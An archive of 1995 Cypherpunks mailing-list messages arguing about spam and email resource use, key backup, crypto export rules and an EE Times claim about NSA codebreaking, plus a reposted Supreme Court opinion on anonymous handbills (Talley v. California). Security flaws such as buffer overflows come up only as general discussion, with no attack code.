Date: Wed, 18 Jan 95 07:54:12 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <Pine.3.88.9501171208.A21790-0100000@CSOS.ORST.EDU>
Message-ID: <199501181554.HAA08177@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Brian Beattie <beattie@CSOS.ORST.EDU>

   I disagree, one can use e-mail to steal.  E-mail consumes resources,
   resources for which the sender may have no right to use.  

It's not theft if there's no direct benefit to the actor.  It does
consume resources, there's no argument about that.  Note, however,
that the scope of any such resource use is with the message as a bit
sequence; no meaning or interpretation of the content is even
relevant.  That is, the resource use does not relate to the email as
communication, merely as a technical operation.

The question remains whether such resource use can ever be considered
unauthorized.  Certainly it's impolite; that's not at issue.

I argue that if you hook your machine up to the Internet, you've
implicitly authorized people to send you packets -- as many as they
want and of whatever nature as they want.  No service provision I've
ever seen gives any recourse to the end user against the provider for
"bad" packets.

I also think this is the one great flaw in the design of the Internet;
namely, that the sender has all the control over what packets flow
over the net.  A receiver can ask for a slowdown or cessation, but
there's no obligation to do so.  This will be, if anything, the
limiting factor in scalability of the internet.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 08:07:43 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <9501172027.AA24378@firefly.prairienet.org>
Message-ID: <199501181607.IAA08201@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: jalicqui@prairienet.org (Jeff Licquia)

   I'm sure that when your hypothetical remailer comes up and I decide to spam
   you with your own words (now I wouldn't do that, now would I? ;-), your
   sysadmin will be comforted by knowing that it's only ones and zeros filling
   his hard disk.

Why sendmail doesn't have anti-spam protection at this point is beyond
me.  Denial of email service to one user should not deny service to
all others.  I consider broken any email system that crashes a machine
because of a disk partition filling.

When your email provider gave you an account, was there an agreement
as to how much mail you could receive?  If there wasn't, that provider
has no good reason to complain if you receive as much email as
possible.  Merely because some else decided to send it to you does not
relieve a provider who has agreed to deliver all mail of that
obligation.

Moral: If you operate an email service, don't offer unlimited fixed
price email.

   In the real world, however, there will
   always be problems with "acceptable use" and "abuse", along with the
   additional problems with establishing policy and so on.

"Acceptable use" is shorthand for "It's a little rickety, please don't
play hard."  That is, the technical means to limit the consequences of
abuse were not developed, because everyone was willing to play nice.
This doesn't scale, and it will have to be fixed before everyone will
put their home computer directly on the net.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 08:13:26 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501180601.BAA16566@bb.hks.net>
Message-ID: <199501181613.IAA08209@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>

   The "spread spectrum" approach might well be indicated for some life-or-
   death key security matters, but the vast majority of PGP users probably
   don't need or want to play Spy vs. Spy with their friends to backup keys.

You use your friends now because off-site storage facilities are not
yet available.  The software for distributed remote backup has yet to
make this operation transparent.

   I recognize that you can't just leave your private keyring lying around
   [physical storage mentioned]

I suspect that most private keys in the future will be held in PCMCIA
cards (initially) and then their smaller replacements.  Backing up a
private key to these allows use of a safe deposit box.

   If it's still "passphrase-protected", an attacker would a) have to know
   what to look for

For scalability, most people will use some standard method, whatever
it is.  This limits the search space of an opponent.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Wed, 18 Jan 95 08:52:33 PST
To: Duncan <djw@pentagon.io.com>
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <199501181321.HAA04672@pentagon.io.com>
Message-ID: <9501180839.ZM8045@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 18,  7:21am, Duncan wrote:
> Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
>
> >> Marc, isn't it possible (legally) to deliver products with a replaceble
> >> encryption library (dll). Delivery with a 40-bit key DLL. The user has
> >> the option to install a dll with a different keysize. Somewhat like
> >> winsock....
> >
> >
> >Actually, it's probably worse than you think:
> >
> >There are govt's out there that won't let you import code that is
> >"encryption ready". You must prove that your software is tamper proof
> >before it can be imported, and tamper proofing means that you can't
> >bolt on security. Also, I believe the export laws disallow "plug in"
> >security in the US...
> >
> >The crypto legal world sucks.
>
> Could you clarify the export restriction on "plug and play" encryption ready
> products?  I am about to embark on a project that I want to be distributed
> freely that would be designed around a generic encryption intereface that I
> would wrap around a real encryption core such as PGP,etc.  I wanted to
include a
> BS encryption in the freely distributable package to prevent export woes.
 The
> project is in design stages now and I don't need this additional headache.

Contact a lawyer. It's *really* complicated, and I'm not a lawyer so anything I
tell you could be wrong in some important way, and then you would get really
angry if the govt started chewing you to pieces.


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@mcom.com              http://home.mcom.com/people/kipp/index.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 18 Jan 95 10:00:06 PST
To: cypherpunks@toad.com
Subject: What is this? Anonymous message failed
Message-ID: <v01510108ab4279f1317d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just got back a message from Julf's remailer that my Anonymous message failed
(wrong password). Needless to say, I didn't try to send one through the
remailer. The message it was refering to is the one I sent to the list
earlier. Is this a repeat of the an/na problems we had in the past?

Confused,

- --Lucky

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Not-the-Real MacPGPv262

iQCVAwUBLxzKlQSQkem38rwFAQGaYAP+MGfUN1Vv7SWR2WX0i/XYCYbwOVPTYj1v
Bkld6/rbrzW1SZ+nriQe1OP/ktuoTG5vO281brfIdNA4SQPK6MGf7JdU4AiXL/dQ
UE/nuE+UN60jL1leZngG717QBUTUetfj8npilfgv74EE0QDlStItP+MntrMspl6D
goePQCSfe5Q=
=69Tv
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@CSOS.ORST.EDU>
Date: Wed, 18 Jan 95 10:17:09 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: (none)
In-Reply-To: <199501181554.HAA08177@largo.remailer.net>
Message-ID: <Pine.3.88.9501181026.A29048-0100000@CSOS.ORST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Eric Hughes wrote:

>    From: Brian Beattie <beattie@CSOS.ORST.EDU>
> 
>    I disagree, one can use e-mail to steal.  E-mail consumes resources,
>    resources for which the sender may have no right to use.  
> 
> It's not theft if there's no direct benefit to the actor.  It does

I must assume that the actor who spams me or sends me unsolicited
email or any email for that matter derives some benifit from this 
activity or they would not do it.

> consume resources, there's no argument about that.  Note, however,
> that the scope of any such resource use is with the message as a bit
> sequence; no meaning or interpretation of the content is even
> relevant.  That is, the resource use does not relate to the email as
> communication, merely as a technical operation.

If I make it clear that I do not wish to receive email from an individual
or group and that individual or group continues to send email then I contend
that they are using my resources in a way that I have not authorized.

> 
> The question remains whether such resource use can ever be considered
> unauthorized.  Certainly it's impolite; that's not at issue.
> 
> I argue that if you hook your machine up to the Internet, you've
> implicitly authorized people to send you packets -- as many as they
> want and of whatever nature as they want.

clearly I disagree.

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 18 Jan 95 07:30:26 PST
To: cypherpunks@toad.com
Subject: NYT on Prodigy Web and Checkfree Suit
Message-ID: <199501181529.KAA07432@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Lewis writes today on Prodigy's new offering of World Wide Web
service. 
 
For email copy send blank message with subject:  PRO_www 
 
 
Saul Hansell writes today on Checkfree's new patent and suit against
National Payment Clearing House, a subsidiary of Intuit. 
 
For email copy send blank message with subject:  CHK_sue 
 
 
For twin use subject:  PRO_CHK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 18 Jan 95 10:42:27 PST
To: Duncan <djw@pentagon.io.com>
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <199501181321.HAA04672@pentagon.io.com>
Message-ID: <Pine.3.89.9501181027.A15911-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



> There are govt's out there that won't let you import code that is
> "encryption ready". You must prove that your software is tamper proof
> before it can be imported, and tamper proofing means that you can't
> bolt on security. Also, I believe the export laws disallow "plug in"
> security in the US...

Central point software faced this problem.

So they made the encryption features of their product a free
add on, and posted it on bulleting boards with instructions
not to download unless you were an American citizen.

Needless to say these instructions were ignored, surprise 
surprise.

Of course this strategy only works if your product is
useful without encryption, and the add on is of limited
use without your product.

I believe that Kevin Welch decided on this strategy.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Wed, 18 Jan 95 10:47:11 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
In-Reply-To: <9501181741.AA20208@firefly.prairienet.org>
Message-ID: <9501181850.AA25257@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


THUS SPAKE jalicqui@prairienet.org (Jeff Licquia):
# Hal wrote:
# >large prime-number factoring.  Contrary to popular belief, the NSA can
# >decrypt public keys of most practical key sizes."  I wonder what this
# >means?  

Just as healthy paranoia, that's worth persuing.
But I bet the author didn't know what they was talking about. 
 
# Another quote from the article posted elsewhere said that, "PGP, which is
# based on the Diffie-Hellman public-key technology developed in the 1970s..."
# This is technically true, since all public-key work (including RSA) is based
# to some extent on DH.  It could be, however, that the author is confusing

DH uses "discrete log" as the hard problem, and very straightforward
mathematics.

RSA uses "factoring" as the hard problem, and a very clever back door.

How do you decide if one is based on the other?

# public-key technology with Diffie-Hellman public-key in particular, which
# (as I understand it) is not particularly secure.

It's still up in the air, isn't it, whether the discrete log or 
factoring is the harder to crack.   My intuition is they're the
same hard.

I know of no problem with DH that RSA doesn't have similar problems.

			strick






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 18 Jan 95 08:03:30 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: (none)
In-Reply-To: <199501181554.HAA08177@largo.remailer.net>
Message-ID: <9501181603.AA01635@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> I argue that if you hook your machine up to the Internet, you've
> implicitly authorized people to send you packets -- as many as they
> want and of whatever nature as they want.  No service provision I've
> ever seen gives any recourse to the end user against the provider for
> "bad" packets.

Be that as it may, people HAVE been kicked off for mischief like
forging routing packets -- and if someone started hosing me down with
any one of several really nasty packet based attacks I'm familiar with
I would expect action to be taken against them.

Remember that degree is important in such instances. You are allowed
to shine a flashlight at your neighbor's house -- you aren't allowed
to shine a fifty megawatt laser. Degree counts.

> I also think this is the one great flaw in the design of the Internet;
> namely, that the sender has all the control over what packets flow
> over the net.  A receiver can ask for a slowdown or cessation, but
> there's no obligation to do so.  This will be, if anything, the
> limiting factor in scalability of the internet.

I doubt it. It really hasn't proved to be an actual problem thus
far. If anything, the limiting factor on scalability is the fact that
the net has no locality of reference, which is making routing design
harder and harder. Routing is currently THE big unsolved problem on
the net -- something outsiders to the IETF rarely suspect, because the
engineers have been faking it so well for so long. Unfortunately, all
the good solutions to the routing problem are mathematically
intractable -- and the practical ones are leading to bad potential
long term problems...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 18 Jan 95 11:12:04 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: (none)
In-Reply-To: <9501181603.AA01635@snark.imsi.com>
Message-ID: <Pine.3.89.9501181033.A15911-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hughes says:
> > I argue that if you hook your machine up to the Internet, you've
> > implicitly authorized people to send you packets -- as many as they
> > want and of whatever nature as they want.  No service provision I've
> > ever seen gives any recourse to the end user against the provider for
> > "bad" packets.
 
On Wed, 18 Jan 1995, Perry E. Metzger wrote:
> Be that as it may, people HAVE been kicked off for mischief like
> forging routing packets -- and if someone started hosing me down with
> any one of several really nasty packet based attacks I'm familiar with
> I would expect action to be taken against them.

Unix is broken.  Windows and DOS are fragile and under construction.

Servers should have built in limits, that cause them to spit back
packets from unknown clients that are unreasonable or strain the
system.

For example an SMTP server should have a default limit on volume
per address and per client, with the user being able to vary
such limits for particular clients or addresses -- trusted or
hostile clients.

At present most unix utilities have arbitrary fixed length internal
buffers for processing variable length fields.  If you overflow 
the buffer by sending pathological data you will crash the system.  
If you know machine code, and you overflow the buffer with 
carefully chosen data then instead of a random crash you can
get the server to do some particular unexpected thing -- for
example the internet worm caused the server to execute a
file that the mail server had just received.

This is one of many bugs that make attacks possible.

This is a bug.  It can and regularly does crash your
system and cause loss of data even if nobody attacks.

Every flaw in the system causes more havoc by accident
than it does by malice.  The correct solution is not
to create institutions capable of dealing effectively
with hostile acts.   The big problem is bugs that urgently
need fixing.

Now even if all the bugs were fixed some really evil
packet based attacks are still possible, in which case
social action -- cutting the connectivity of a host
that generates bad packets -- is still necessary, but 
again bad packets are more common by malfunction
than by malice.

> I doubt it. It really hasn't proved to be an actual problem thus
> far. If anything, the limiting factor on scalability is the fact that
> the net has no locality of reference, which is making routing design
> harder and harder. Routing is currently THE big unsolved problem on
> the net -- something outsiders to the IETF rarely suspect, because the
> engineers have been faking it so well for so long. Unfortunately, all
> the good solutions to the routing problem are mathematically
> intractable -- and the practical ones are leading to bad potential
> long term problems..

This is inaccurate.  Optimal solutions to the routing problem are
mathematically intractable.  Tolerable solutions are mathematically
tractable.  For realistic routing problems, tractable approximations
are only worse than an optimal solution by a modest factor.

There are real world problems where tractable approximations
are not good enough, but routing is not one of them.

Of course I am sure Perry is correct when he says that
the tractable approximations that we are currently using 
fail to scale, but this is not a fundamental unsolved 
problem in mathematics -- it is merely yet another bug.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 11:17:31 PST
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: TEMPEST
In-Reply-To: <199501181520.AB24570@mail.eskimo.com>
Message-ID: <199501181916.LAA09619@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara wrote:

> The Cyphernomicon talks about a proposed, early Cypherpunk project that
> dealt with TEMPEST/VanEck monitoring.  Did anyone carry this out beyond the
> idea stage?  All I ever seem to see is "theory" and "hear-say" on this topic
> (and the original VanEck article appears dated and incomplete).

We all need to remember that projects are not "proposed" and then
"assigned." That is, projects only get done when someone decides to
personally champion that project.

I'm sure this is obvious, but maybe not.

The TEMPEST thread comes up now and then, but nobody (at least to my
knowledge) has gotten interested enough to pursue it. Before anyone
ever asks why _others_ are not doing work in this area, they should
look to themselves. (Not meant to be a critical remark directed at
Joel, just a general comment that the only things that get done are
the things that get done.)

> I noticed the Consumertronics (John Williams in Alamogordo, New Mexico)
> catalog has an assembled device that will work with EGA to SVGA monitors.
> $3,995 seems a bit pricey though (or is it).  Has anyone had dealings with
> Consumertronics in the past?

TEMPEST has very little to do with Cypherpunks goals, actually. First,
buying such a gadget, tweaking it, exploring capabilities, etc., would
lead to what? The ability to park a van in front of someone's house
and--maybe--monitor their screens? We already know this is possible.
(You all knew that, didn't you?)

I'm not saying it wouldn't be useful to have someone on our list who
has a lot of experience in this area, but mainly just for the
"background" it would provide.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 09:21:49 PST
To: cypherpunks@toad.com
Subject: Re: (none)
Message-ID: <9501181721.AA13078@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Eric wrote:
>   From: jalicqui@prairienet.org (Jeff Licquia)
>
>   I'm sure that when your hypothetical remailer comes up and I decide to spam
>   you with your own words (now I wouldn't do that, now would I? ;-), your
>   sysadmin will be comforted by knowing that it's only ones and zeros filling
>   his hard disk.
>
>Why sendmail doesn't have anti-spam protection at this point is beyond
>me.  Denial of email service to one user should not deny service to
>all others.  I consider broken any email system that crashes a machine
>because of a disk partition filling.

Yes, this is true.  Even if it didn't crash the system, however, it could
have the effect of disabling mail service, either to all users on the system
or to the particular user being spammed (depending on the robustness of the
system).  Though it's not as likely to anger the sysadmin, it is more likely
to anger the spamee.  More to the point, if the spammer uses random
anonymous remailers to protect his/her identity, there's no good way to
prevent this attack short of installing a filter of some kind or refusing
mail from remailers.  If no one will accept mail from the anon remailers,
what good are they?

>When your email provider gave you an account, was there an agreement
>as to how much mail you could receive?  If there wasn't, that provider
>has no good reason to complain if you receive as much email as
>possible.  Merely because some else decided to send it to you does not
>relieve a provider who has agreed to deliver all mail of that
>obligation.

I though most usage agreements had something in them about reasonable limits
and such.  On that basis, a provider could choose to auto-kill spam if they
thought it "unreasonable".  This of course assumes that providers always
abide by well-defined rules and are not arbitrary in any way. :-)

{As to my personal situation, since you asked: Prairienet has quotas.)

>   In the real world, however, there will
>   always be problems with "acceptable use" and "abuse", along with the
>   additional problems with establishing policy and so on.
>
>"Acceptable use" is shorthand for "It's a little rickety, please don't
>play hard."  That is, the technical means to limit the consequences of
>abuse were not developed, because everyone was willing to play nice.
>This doesn't scale, and it will have to be fixed before everyone will
>put their home computer directly on the net.

It's been my experience up to this point that for each security safeguard
put in place, there will be someone somewhere that will find a way to breach
it.  Perhaps strong crypto will serve to end that trend; I doubt it, though,
due to the horrid legal situation.  Thus I doubt that written,
human-enforced policy will disappear anytime soon.  Not an ideal situation,
I must admit.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 09:41:44 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
Message-ID: <9501181741.AA20208@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
>This, from a sidebar, is really surprising:  "In contrast, public keys
>allow the overt publication of an encryption key, because decryption keys
>can only be derived through a mathematically difficult process, such as
>large prime-number factoring.  Contrary to popular belief, the NSA can
>decrypt public keys of most practical key sizes."  I wonder what this
>means?  If it is a claim that the NSA can factor 1024 bit moduli that
>would certainly come as a big surprise.  If they are saying that they can
>do 512 bits that would be more believable although of interest.  It is
>strange that the author would include a statement like this without
>attribution or evidence.

Another quote from the article posted elsewhere said that, "PGP, which is
based on the Diffie-Hellman public-key technology developed in the 1970s..."
This is technically true, since all public-key work (including RSA) is based
to some extent on DH.  It could be, however, that the author is confusing
public-key technology with Diffie-Hellman public-key in particular, which
(as I understand it) is not particularly secure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Wed, 18 Jan 95 08:47:35 PST
To: cypherpunks@toad.com
Subject: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity]
Message-ID: <9501181647.AA13819@toast>
MIME-Version: 1.0
Content-Type: text/plain



Return-Path: <rre-request@weber.ucsd.edu>
Resent-Date: Tue, 17 Jan 1995 18:00:48 -0800
Date: Tue, 17 Jan 1995 18:00:02 -0800
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: Supreme Court decision on anonymity
Resent-From: rre@weber.ucsd.edu
Reply-To: rre-maintainers@weber.ucsd.edu
X-Url: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/534
X-Loop: rre@weber.ucsd.edu
Precedence: list
Resent-Sender: rre-request@weber.ucsd.edu

Dave Banisar from the Electronic Privacy Information Center sent 
me the enclosed text of the US Supreme Court's decision denying the
constitutionality of laws banning anonymous leaflets.  This decision
has an obvious relevance to current debates about regulating anonymous
messages on the Internet.

Date: Tue, 17 Jan 1995 16:17:44 EST    
From: Dave Banisar <banisar@washofc.epic.org>
Subject: anonymity 

[...]

                TALLEY v. CALIFORNIA

          SUPREME COURT OF THE UNITED STATES

                     362 U.S. 60

            January 13-14, 1960, Argued  
               March 7, 1960, Decided


Certiorari to the Appellate Department of the Superior Court of
California, Los Angeles County.


 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed.

 A. L. Wirin and Hugh R. Manes argued the cause for petitioner.  With
them on the brief was Fred Okrand.

   Philip E. Grey argued the cause for respondent.  With him on the
brief was Roger Arnebergh.

   Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed
a brief for the American Jewish Congress, as amicus curiae, urging
reversal.

 Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan,
Whittaker, Stewart

 MR. JUSTICE BLACK delivered the opinion of the Court.

   The question presented here is whether the provisions of a Los
Angeles City ordinance restricting the distribution of handbills
"abridge the freedom of speech and of the press secured against state
invasion by the Fourteenth Amendment of the Constitution." n1 The
ordinance, @ 28.06 of the Municipal Code of the City of Los Angeles,
provides:

   "No person shall distribute any hand-bill in any place under any
circumstances, which does not have printed on the cover, or the face
thereof, the name and address of the following:
 "(a) The person who printed, wrote, compiled or manufactured the
same.
 "(b) The person who caused the same to be distributed; provided,
however, that in the case of a fictitious person or club, in addition
to such fictitious name, the true names and addresses of the owners,
managers or agents of the person sponsoring said hand-bill shall also
appear thereon."

   The petitioner was arrested and tried in a Los Angeles Municipal
Court for violating this ordinance.  It was stipulated that the
petitioner had distributed handbills in Los Angeles, and two of them
were presented in evidence.  Each had printed on it the following:


   National Consumers Mobilization,

   Box 6533,

   Los Angeles 55, Calif.

   PLeasant 9-1576.
 The handbills urged readers to help the organization carry on a
boycott against certain merchants and businessmen, whose names were
given, on the ground that, as one set of handbills said, they carried
products of "manufacturers who will not offer equal employment
opportunities to Negroes, Mexicans, and Orientals." There also
appeared a blank, which, if signed, would request enrollment of the
signer as a "member of National Consumers Mobilization," and which
was preceded by a statement that "I believe that every man should
have an equal opportunity for employment no matter what his race,
religion, or place of birth."

   The Municipal Court held that the information printed on the
handbills did not meet the requirements of the ordinance, found the
petitioner guilty as charged, and fined him $ 10.  The Appellate
Department of the Superior Court of the County of Los Angeles
affirmed the conviction, rejecting petitioner's contention, timely
made in both state courts, that the ordinance invaded his freedom of
speech and press in violation of the Fourteenth and First Amendments
to the Federal Constitution. n2 172 Cal. App. 2d Supp. 797, 332 P. 2d
447. Since this was the highest state court available to petitioner,
we granted certiorari to consider this constitutional contention.
360 U.S. 928.

    In Lovell v. Griffin, 303 U.S. 444,   we held void on its face an
ordinance that comprehensively forbade any distribution of literature
at any time or place in Griffin, Georgia, without a license.
Pamphlets and leaflets, it was pointed out, "have been historic
weapons in the defense of liberty" n3 and enforcement of the Griffin
ordinance "would restore the system of license and censorship in its
baldest form." Id., at 452. A year later we had before us four
ordinances each forbidding distribution of leaflets -- one in
Irvington, New Jersey, one in Los Angeles, California, one in
Milwaukee, Wisconsin, and one in Worcester, Massachusetts.  Schneider
v. State, 308 U.S. 147. Efforts were made to distinguish these four
ordinances from the one held void in the Griffin case.  The chief
grounds urged for distinction were that the four ordinances had been
passed to prevent either frauds, disorder, or littering, according to
the records in these cases, and another ground urged was that two of
the ordinances applied only to certain city areas.  This Court
refused to uphold the four ordinances on those grounds pointing out
that there were other ways to accomplish these legitimate aims
without abridging freedom of speech and press.  Frauds, street
littering and disorderly conduct could be denounced and punished as
offenses, the Court said.  Several years later we followed the
Griffin and Schneider cases in striking down a Dallas, Texas,
ordinance which was applied to prohibit the dissemination of
information by the distribution of handbills.  We said that although
a city could punish any person for conduct on the streets if he
violates a valid law, "one who is rightfully on a street . . .
carries with him there as elsewhere the constitutional right to
express his views in an orderly fashion . . . by handbills and
literature as well as by the spoken word." Jamison v. Texas, 318 U.S.
413, 416.

   The broad ordinance now before us, barring distribution of "any
hand-bill in any place under any circumstances," n4 falls precisely
under the ban of our prior cases unless this ordinance is saved by
the qualification that handbills can be distributed if they have
printed on them the names and addresses of the persons who prepared,
distributed  or sponsored them.  For, as in Griffin, the ordinance
here is not limited to handbills whose content is "obscene or
offensive to public morals or that advocates unlawful conduct." n5
Counsel has urged that this ordinance is aimed at providing a way to
identify those responsible for fraud, false advertising and libel.
Yet the ordinance is in no manner so limited, nor have we been
referred to any legislative history indicating such a purpose.
Therefore we do not pass on the validity of an ordinance limited to
prevent these or any other supposed evils.  This ordinance simply
bars all handbills under all circumstances anywhere that do not have
the names and addresses printed on them in the place the ordinance
requires.

   There can be no doubt that such an identification requirement
would tend to restrict freedom to distribute information and thereby
freedom of expression. "Liberty of circulating is as essential to
that freedom as liberty of publishing; indeed, without the
circulation, the publication would be of little value." Lovell v.
Griffin, 303 U.S., at 452.

   Anonymous pamphlets, leaflets, brochures and even books have
played an important role in the progress of mankind.  Persecuted
groups and sects from time to time throughout history have been able
to criticize oppressive practices and laws either anonymously or not
at all.  The obnoxious press licensing law of England, which was also
enforced on the Colonies was due in part to the knowledge that
exposure of the names of printers, writers and distributors would
lessen the circulation of literature critical of the government.  The
old seditious libel cases in England show the lengths  to which
government had to go to find out who was responsible for books that
were obnoxious  to the rulers.  John Lilburne was whipped, pilloried
and fined for refusing to answer questions designed to get evidence
to convict him or someone else for the secret distribution of books
in England.  Two Puritan Ministers, John Penry and John Udal, were
sentenced to death on charges that they were responsible for writing,
printing or publishing books. n6 Before the Revolutionary War
colonial patriots frequently had to conceal their authorship or
distribution of literature that easily could have brought down on
them prosecutions by English-controlled courts.  Along about that
time the Letters of Junius were written and the identity of their
author is unknown to this day. n7 Even the Federalist Papers, written
in favor of the adoption of our Constitution, were published under
fictitious names.  It is plain that anonymity has sometimes been
assumed for the most constructive purposes.

   We have recently had occasion to hold in two cases that there are
times and circumstances when States may not compel members of groups
engaged in the dissemination of ideas to be publicly identified.
Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v. Alabama, 357
U.S. 449, 462. The reason for those holdings was that identification
and fear of reprisal might deter perfectly peaceful discussions of
public matters of importance.  This broad Los Angeles ordinance is
subject to the same infirmity.  We hold that it, like the Griffin,
Georgia, ordinance, is void on its face.

   The judgment of the Appellate Department of the Superior Court of
the State of California is reversed and the cause is remanded to it
for further proceedings not inconsistent with this opinion.

   It is so ordered.

Footnotes

   n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin,
303 U.S. 444, 450.

  n2 Petitioner also argues here that the ordinance both on its face
and as construed and applied "arbitrarily denies petitioner equal
protection of the laws in violation of the Due Process and Equal
Protection" Clauses of the Fourteenth Amendment.  This argument is
based on the fact that the ordinance applies to handbills only, and
does not include within its proscription books, magazines and
newspapers.  Our disposition of the case makes it unnecessary to
consider this contention.

   n3 The Court's entire sentence was: "These [pamphlets and
leaflets] indeed have been historic weapons in the defense of
liberty, as the pamphlets of Thomas Paine and others in our own
history abundantly attest." It has been noted that some of Thomas
Paine's pamphlets were signed with pseudonyms.  See Bleyer, Main
Currents in the History of American Journalism (1927), 90-93.
Illustrations of other anonymous and pseudonymous pamphlets and other
writings used to discuss important public questions can be found in
this same volume.

   n4 Section 28.00 of the Los Angeles Municipal Code defines
"handbill" as follows: "'HAND-BILL' shall mean any hand-bill, dodger,
commercial advertising circular, folder, booklet, letter, card,
pamphlet, sheet, poster, sticker, banner, notice or other written,
printed or painted matter calculated to attract attention of the
public."

  n5 Lovell v. Griffin, 303 U.S., at 451.

   n6 Penry was executed and Udal died as a result of his
confinement.  1 Hallam, The Constitutional History of England (1855),
205-206, 232.

   n7 In one of the letters written May 28, 1770, the author asked
the following question about the tea tax imposed on this country, a
question which he could hardly have asked but for his anonymity:
 "What is it then, but an odious, unprofitable exertion of a
speculative right, and fixing a badge of slavery upon the Americans,
without service to their masters?" 2 Letters of Junius (1821) 39.


MR. JUSTICE HARLAN, concurring.

   In judging the validity of municipal action affecting rights of
speech or association protected against invasion by the Fourteenth
Amendment, I do not believe that we can escape, as Mr. Justice
Roberts said in Schneider v. State, 308 U.S. 147, 161, "the delicate
and difficult   task" of weighing "the circumstances" and appraising
"the substantiality of the reasons advanced in support of the
regulation of the free enjoyment of" speech.  More recently we have
said that state action impinging on free speech and association will
not be sustained unless the governmental interest asserted to support
such impingement is compelling.  See N. A. A. C. P. v. Alabama, 357
U.S. 449, 463, 464; Sweezy v. New Hampshire, 354 U.S. 234, 265
(concurring opinion); see also Bates v. Little Rock, 361 U.S. 516.

